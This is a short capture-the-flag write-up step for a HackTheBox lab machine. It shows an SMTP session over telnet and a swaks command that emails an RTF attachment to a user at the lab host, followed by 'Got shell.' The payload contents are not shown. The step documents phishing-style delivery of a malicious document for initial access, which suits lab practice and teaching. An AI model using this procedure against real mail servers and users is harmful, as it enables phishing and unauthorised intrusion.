CTFLover hack stuff | CTF solutions

20-SendingEmail

➜  exploit telnet reel.htb.local  25
Trying 10.10.10.77...
Connected to reel.htb.local.
Escape character is '^]'.
220 Mail Service ready
HELO hi
250 Hello.
MAIL FROM: <hi@hello.com>
250 OK
RCPT TO: <nico@megabank.com>
250 OK

I ll use swaks to send mail

➜  exploit swaks --server 10.10.10.77 -f hey@htb.reel -t nico@megbank.com --attach hey.rtf         
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the 
future.  Prefix filenames with '@' instead.                                                        
=== Trying 10.10.10.77:25...                                                                       
=== Connected to 10.10.10.77.                                                                      
<-  220 Mail Service ready
 -> EHLO kali
<-  250-REEL
<-  250-SIZE 20480000
<-  250-AUTH LOGIN PLAIN 
<-  250 HELP
 -> MAIL FROM:<hey@htb.reel>
<-  250 OK
 -> RCPT TO:<nico@megbank.com>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Sat, 13 Jan 2024 17:56:54 +0530
 -> To: nico@megbank.com 
 -> From: hey@htb.reel

Pasted image 20240113180242.png

Got shell.